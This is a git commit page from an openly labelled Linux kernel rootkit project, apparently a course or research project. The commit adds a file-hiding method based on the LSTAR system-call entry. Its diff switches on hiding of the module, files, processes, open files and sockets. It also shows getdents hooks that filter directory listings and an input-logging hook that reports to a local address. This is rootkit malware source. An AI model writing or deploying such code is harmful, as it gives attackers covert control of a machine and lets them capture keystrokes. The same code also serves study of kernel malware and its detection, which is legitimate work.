Integrate lstar file hide with rest of rootkit - linux-rootkit - Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)

commit 847f49050abe513c2f87bbb485b1ad7f44660ec4
parent fde876c894208fd347b7db001a3a3c334f363f82
Author: Tizian Leonhardt <tizianleonhardt@web.de>
Date:   Sun, 10 Jan 2021 22:49:41 +0100

Integrate lstar file hide with rest of rootkit

Diffstat:
M src/g7.c  | 2 +-
M src/hook.c  | 40 ++++++++++++++++++++--------------------
M src/rootkit.h  | 8 +++++++-

3 files changed, 28 insertions(+), 22 deletions(-)
diff --git a/src/g7.c b/src/g7.c
@@ -41,7 +41,7 @@ static struct file_operations g7_fops =
 
 rootkit_t rootkit = {
     .hiding_module  = true,
-    .hiding_files   = false,
+    .hiding_files   = FH_LSTAR,
     .hiding_open    = true,
     .hiding_pids    = true,
     .hiding_sockets = true,
diff --git a/src/hook.c b/src/hook.c
@@ -77,14 +77,16 @@ init_hooks(void)
     if (rootkit.hiding_module)
         hide_module();
 
-    // if (rootkit.hiding_files)
-    //     hide_files();
+    if (rootkit.hiding_files == FH_TABLE)
+        hide_files();
+    else if (rootkit.hiding_files == FH_LSTAR)
+        hide_files_lstar();
 
-    // if (rootkit.hiding_open)
-    //     hide_open();
+    if (rootkit.hiding_open)
+        hide_open();
 
-    // if (rootkit.hiding_pids)
-    //     hide_pids();
+    if (rootkit.hiding_pids)
+        hide_pids();
 
     if (rootkit.hiding_sockets)
         hide_sockets();
@@ -99,8 +101,6 @@ init_hooks(void)
 
     if (rootkit.logging_input)
         log_input("127.0.0.1", "5000");
-
-    hide_files_lstar();
 }
 
 void
@@ -109,16 +109,18 @@ remove_hooks(void)
     if (rootkit.hiding_module)
         unhide_module();
 
-    // if (rootkit.hiding_files)
-    //     unhide_files();
+    if (rootkit.hiding_files == FH_TABLE)
+        unhide_files();
+    else if(rootkit.hiding_files == FH_LSTAR)
+        unhide_files_lstar();
 
-    // if (rootkit.hiding_open)
-    //     unhide_open();
+    if (rootkit.hiding_open)
+        unhide_open();
 
-    // if (rootkit.hiding_pids) {
-    //     clear_hidden_pids();
-    //     unhide_pids();
-    // }
+    if (rootkit.hiding_pids) {
+        clear_hidden_pids();
+        unhide_pids();
+    }
 
     if (rootkit.hiding_sockets)
         unhide_sockets();
@@ -131,8 +133,6 @@ remove_hooks(void)
 
     if (rootkit.logging_input)
         unlog_input();
-
-    unhide_files_lstar();
 }
 
 void
@@ -222,7 +222,7 @@ g7_getdents(const struct pt_regs *pt_regs)
     inode_list_t_ptr hi_head, hi_tail;
     hi_head = hi_tail = &hidden_inodes;
 
-    if (rootkit.hiding_files) {
+    if (rootkit.hiding_files == FH_TABLE) {
         struct list_head *i;
         list_for_each(i, &kdirent_dentry->d_subdirs) {
             unsigned long inode;
@@ -303,7 +303,7 @@ g7_getdents64(const struct pt_regs *pt_regs)
     inode_list_t_ptr hi_head, hi_tail;
     hi_head = hi_tail = &hidden_inodes;
 
-    if (rootkit.hiding_files) {
+    if (rootkit.hiding_files == FH_TABLE) {
         struct list_head *i;
         list_for_each(i, &kdirent_dentry->d_subdirs) {
             unsigned long inode;
diff --git a/src/rootkit.h b/src/rootkit.h
@@ -9,10 +9,16 @@ typedef enum {
     BD_TTY,
 } bd_state_t;
 
+typedef enum {
+    FH_OFF = 0,
+    FH_TABLE,
+    FH_LSTAR,
+} fh_state_t;
+
 typedef struct {
     sc_hook_t hooks[16];
     bool hiding_module;
-    bool hiding_files;
+    fh_state_t hiding_files;
     bool hiding_pids;
     bool hiding_open;
     bool hiding_sockets;

	linux-rootkit Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
	git clone git://git.deurzen.net/linux-rootkit
	Log \| Files \| Refs

M	src/g7.c	\|	2	+-
M	src/hook.c	\|	40	++++++++++++++++++++--------------------
M	src/rootkit.h	\|	8	+++++++-